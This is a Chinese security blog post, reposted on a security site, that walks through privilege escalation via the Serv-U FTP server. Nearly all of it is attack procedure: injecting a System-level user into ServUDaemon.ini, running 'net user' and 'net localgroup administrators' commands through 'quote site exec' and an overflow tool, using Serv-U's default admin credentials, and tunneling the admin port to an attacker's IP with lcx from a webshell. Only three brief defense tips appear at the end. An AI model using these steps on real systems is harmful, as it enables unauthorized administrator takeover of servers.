第三方软件ser-u提权

admin 2022年1月6日01:47:52安全博客评论14 views2667字阅读8分53秒阅读模式

0x00 serv-u简介

  • Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
  • Serv-u服务具有多个用户
  • serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
  • serv-u密码文件:ServUDaemon.ini
  • 端口号:默认端口是43958
    ServUDaemon.ini中localsetuportNo=端口
  • SerUDaemon.ini中修改密码默认重启服务生效,如果想要立即生效,需要在[GLOBAL]字段部分添加ReloadSetting=True,这个语句在Serv-u重新载入ServUDaemon.ini的内容后会自动消失
  • serv-u默认管理账号是LocalAdministrator,默认密码是”#[email protected]$ak#.lk;[email protected]

0x01 FTP提权方法

1、有修改权限

2、无权限修改

3、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

4、serv-u ftp转发端口

0x02 有修改权限

步骤如下:

1、判断是否安装serv-u

nmap扫端口确认

2、检查是否有可写权限

一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini

3、在serv-u中添加用户

在user4=添加一个系统用户

1
2
3
4
5
6
7
8
9
10
[USER=quan|1]                                //用户名
Password= //用户密码加密后的密文
HomeDir=c:\ftp\quan //目录
RelPaths=3
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:\|RWAMELCDP //可访问的目录及权限
Access2=d:\|RWAMELCDP //可访问的目录及权限
Access3=e:\|RWAMELCDP //可访问的目录及权限
SKEYValues=

加密规则 password=2位随机字符+md5(2位随机字符+123456)

举例:

1
2
3
4
5
6
7
8
9
10
11
[USER=spiger|1]                                //用户名
Password=sbd8b58b5c201ee5cc20f9a8551197d4a5 //用户密码加密后的密文
HomeDir=c:\ftp\seven //目录
RelPaths=3
TimeOut=600 //超时时间设置
Maintenance=System //权限
Access1=C:\|RWAMELCDP //可访问的目录及权限
Access2=d:\|RWAMELCDP //可访问的目录及权限
Access3=e:\|RWAMELCDP //可访问的目录及权限
SKEYValues=

注解:斜杠为理解之用,并非也要予以添加
添加上述代码并保存后,就会在serv-u中添加用户名为spiger,密码是123456。

其中pasword字段中:sb+MD5(sb123456) ,其中sb为随机字符

Access1=C:|RWAMELCDP(这个代表所有权限,包括可执行)

maintenance=system 是代表系统权限 user=你命名的用户

4、连接目标FTP服务器

1
ftp 目标IP地址 刚添加的用户密码

5、利用ftp命令quote site exec添加用户加入administrators权限组

1
2
quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add

0x03 无修改权限

1、利用md5 直接去解密

2、默认用户名密码

账户:LocalAdministrator ,密码:#[email protected]$ak#.lk;[email protected]
命令:
cmd /c net user quan quan123 /add & net localgroup administrators quan /add

3、不是默认密码时

直接把受害机的SerUAdmin.exe 下载下来
用winhex打开查找LocalAdministrator(选择ANSI字符)进行查找密码

实操:

image-20200924111840645

通过c32hex进行查看,搜索LocalAdministrator字段,

.后面就是密码

serv-u7中管理员的口令在C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain.Archive文件中,破解方法和serv-u6是一样的

0x04 serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

步骤如下:

1、用Serv-U提权综合工具生成提权工具serv_u.exe

2、先上传 serv_u.exe 到一个盘符下

比如是d盘

3、执行命令

1
2
3
d:\serv_u.exe
d:\serv_u.exe “net user quan quan123 /add”
d:\serv_u.exe “net localgroup administrators quan /add”

注意命令要有引号

0x05 serv-u ftp转发端口

1、lcx端口转发

在目标Webshell上运行LCX命令

1
lcx -slave yourIP 5000 127.0.0.1 43958

在本机上运行

1
lcx -listen 5000 21

2、本机登陆Serv_U

打开本地的SERV_U 在IP上填入127.0.0.1
帐号写LocalAdministrator 密码#[email protected]$ak#.lk;[email protected]

0x06webshell+serv-u实操

倘若口令更改了大家可以去serv-u的目录(默认路径:C:\Program Files\Serv-U\)找其配置文件(ServUDaemon.ini),在配置文件中有其密码。

imgimg

webshell里默认的执行。如下操作:

img

img

img

img

img

0x07防御方法

1.确保serv-u安装路径只有系统用户访问权限
2.确保建立的ftp账号不要给执行权限
3.修改ftp默认监听端口

0x08m 参考

https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html
https://www.cnblogs.com/0nc3/p/12097070.html
https://www.cnblogs.com/xishaonian/p/6253115.html

FROM :b0urne.top | Author:b0urne

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:47:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  第三方软件ser-u提权 http://cn-sec.com/archives/722757.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: